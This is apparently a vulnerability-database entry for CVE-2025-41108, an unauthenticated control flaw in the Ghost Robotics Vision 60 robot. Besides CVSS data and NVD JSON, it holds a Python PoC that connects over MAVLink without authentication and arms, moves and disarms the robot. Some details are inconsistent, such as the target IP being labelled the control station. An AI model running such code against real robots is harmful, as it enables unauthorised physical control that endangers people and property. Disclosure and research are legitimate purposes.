CVE-2025-41108

Description

The communication protocol implemented in Ghost Robotics Vision 60 v0.27.2 could allow an attacker to send commands to the robot from an external attack station, impersonating the control station (tablet) and gaining unauthorised full control of the robot. The absence of encryption and authentication mechanisms in the communication protocol allows an attacker to capture legitimate traffic between the robot and the controller, replicate it, and send any valid command to the robot from any attacking computer or device. The communication protocol used in this interface is based on MAVLink, a widely documented protocol, which increases the likelihood of attack. There are two methods for connecting to the robot remotely: Wi-Fi and 4G/LTE.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:ghostrobotics:vision_60_firmware:0.27.2:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:ghostrobotics:vision_60:-:*:*:*:*:*:*:* - NOT VULNERABLE

Ghost Robotics Vision 60 < v0.27.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-41108 - Ghost Robotics Vision 60 MAVLink Protocol Exploitation PoC
# This PoC demonstrates how an attacker can send unauthorized commands
# to a Ghost Robotics Vision 60 robot by exploiting the lack of
# authentication and encryption in the MAVLink communication protocol.

import socket
import time
from pymavlink import mavutil

# Target robot IP address (Wi-Fi or 4G/LTE network)
ROBOT_IP = "192.168.1.100"  # Default Vision 60 control station IP
ROBOT_PORT = 14550  # Default MAVLink port

# Create MAVLink connection (no authentication required)
master = mavutil.mavlink_connection(f'udp:{ROBOT_IP}:{ROBOT_PORT}')

# Wait for heartbeat from the robot
print("[*] Waiting for robot heartbeat...")
master.wait_heartbeat()
print(f"[+] Connected to robot system: {master.target_system}")

# Send arm/disarm command to demonstrate unauthorized control
def send_arm_command(arm_status=1):
    """Send ARM/DISARM command to the robot"""
    master.mav.command_long_send(
        master.target_system,
        master.target_component,
        mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
        0,  # confirmation
        arm_status,  # 1 = arm, 0 = disarm
        0, 0, 0, 0, 0, 0
    )
    print(f"[+] ARM command sent: {'ARMED' if arm_status else 'DISARMED'}")

# Send movement command to demonstrate full control
def send_movement_command(velocity_x, velocity_y, velocity_z):
    """Send velocity command to control robot movement"""
    master.mav.set_position_target_local_ned_send(
        0,  # time_boot_ms
        master.target_system,
        master.target_component,
        mavutil.mavlink.MAV_FRAME_LOCAL_NED,
        0b0000111111000111,  # type_mask (only velocities enabled)
        0, 0, 0,  # x, y, z positions
        velocity_x, velocity_y, velocity_z,  # vx, vy, vz velocities
        0, 0, 0,  # afx, afy, afz accelerations
        0, 0  # yaw, yaw_rate
    )
    print(f"[+] Movement command sent: vx={velocity_x}, vy={velocity_y}, vz={velocity_z}")

# Main exploitation sequence
if __name__ == "__main__":
    print("[*] CVE-2025-41108 Exploitation PoC")
    print("[*] Target: Ghost Robotics Vision 60")
    print("[*] Exploiting lack of authentication in MAVLink protocol...")

    # Step 1: Arm the robot without authorization
    send_arm_command(1)
    time.sleep(2)

    # Step 2: Send movement commands
    send_movement_command(1.0, 0.0, 0.0)  # Move forward
    time.sleep(3)
    send_movement_command(0.0, 0.0, 0.0)  # Stop
    time.sleep(1)

    # Step 3: Disarm the robot
    send_arm_command(0)
    print("[+] Exploitation complete - unauthorized control demonstrated")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41108
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41108
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41108/
[4] VulDB https://vuldb.com/cve/CVE-2025-41108
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-ghost-robotics-vision-60

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41108", "sourceIdentifier": "[email protected]", "published": "2025-10-22T09:15:36.423", "lastModified": "2025-10-31T19:45:12.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The communication protocol implemented in Ghost Robotics Vision 60 v0.27.2 could allow an attacker to send commands to the robot from an external attack station, impersonating the control station (tablet) and gaining unauthorised full control of the robot. The absence of encryption and authentication mechanisms in the communication protocol allows an attacker to capture legitimate traffic between the robot and the controller, replicate it, and send any valid command to the robot from any attacking computer or device. The communication protocol used in this interface is based on MAVLink, a widely documented protocol, which increases the likelihood of attack. There are two methods for connecting to the robot remotely: Wi-Fi and 4G/LTE."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ghostrobotics:vision_60_firmware:0.27.2:*:*:*:*:*:*:*", "matchCriteriaId": "6C0D9971-6E9B-4F72-B650-A3FD0B004507"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ghostrobotics:vision_60:-:*:*:*:*:*:*:*", "matchCriteriaId": "5E213EE6-FF18-4C56-8CE0-50E140A650E3"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-ghost-robotics-vision-60", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}